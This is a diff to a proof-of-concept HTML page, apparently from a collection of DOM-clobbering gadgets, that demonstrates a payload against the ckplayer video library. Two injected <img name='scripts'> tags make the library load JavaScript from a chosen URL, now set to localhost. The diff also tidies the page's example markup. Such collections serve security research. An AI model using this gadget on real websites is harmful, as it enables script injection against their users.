--- a/domc-gadgets-assets/gadgets/ckplayer/poc.html
+++ b/domc-gadgets-assets/gadgets/ckplayer/poc.html
@@ -22,19 +22,18 @@
 <section class="section">
   <div class="column">
   <p><span class="label">Payload</span><br><br>
-  <pre>&lt;img name=&quot;scripts&quot; src=&quot;https://xxx.xxx.xxx/js/&quot;&gt;
-&lt;img name=&quot;scripts&quot; src=&quot;https://xxx.xxx.xxx/js/&quot;&gt;</pre>
-  <img name="scripts" src="https://xxx.xxx.xxx/js/">
-<img name="scripts" src="https://xxx.xxx.xxx/js/">
+  <pre>&lt;img name=&quot;scripts&quot; src=&quot;http://localhost:9999/js/&quot;&gt;
+&lt;img name=&quot;scripts&quot; src=&quot;http://localhost:9999/js/&quot;&gt;</pre>
+  <img name="scripts" src="http://localhost:9999/js/">
+<img name="scripts" src="http://localhost:9999/js/">
   </div>
 </section>
 
 <section class="section">
   <div class="column">
   <p><span class="label">Library</span><br><br>
-  <pre>&lt;script&gt;
-&lt;link type=&quot;text/css&quot; rel=&quot;stylesheet&quot; href=&quot;ckplayer/css/ckplayer.css&quot; /&gt;
-&lt;script type=&quot;text/javascript&quot; src=&quot;ckplayer/js/ckplayer.js&quot; charset=&quot;UTF-8&quot;&gt;&lt;/script&gt;
+  <pre>&lt;link type=&quot;text/css&quot; rel=&quot;stylesheet&quot; href=&quot;ckplayer/css/ckplayer.css&quot; /&gt;
+&lt;script type=&quot;text/javascript&quot; src=&quot;./ckplayer/js/ckplayer.js&quot; charset=&quot;UTF-8&quot;&gt;&lt;/script&gt;
 &lt;div class=&quot;video&quot; style=&quot;width: 600px;height: 400px;&quot;&gt;播放器容器&lt;/div&gt;
 &lt;script type=&quot;text/javascript&quot;&gt;
     var videoObject = {
@@ -43,11 +42,9 @@
         video: &#x27;https://fake-server/no.mp4&#x27;
     };
     var player = new ckplayer(videoObject);
-&lt;/script&gt;
 &lt;/script&gt;</pre>
-  <script>
-<link type="text/css" rel="stylesheet" href="ckplayer/css/ckplayer.css" />
-<script type="text/javascript" src="ckplayer/js/ckplayer.js" charset="UTF-8"></script>
+  <link type="text/css" rel="stylesheet" href="ckplayer/css/ckplayer.css" />
+<script type="text/javascript" src="./ckplayer/js/ckplayer.js" charset="UTF-8"></script>
 <div class="video" style="width: 600px;height: 400px;">播放器容器</div>
 <script type="text/javascript">
     var videoObject = {
@@ -57,13 +54,12 @@
     };
     var player = new ckplayer(videoObject);
 </script>
-</script>
   </div>
 </section>
 
 <section class="section">
   <div class="column">
-  <a href="../doomcaptcha/poc.html">Next: doomcaptcha</a>
+  <a href="../curl/poc.html">Next: curl</a>
   </div>
 </section>
 
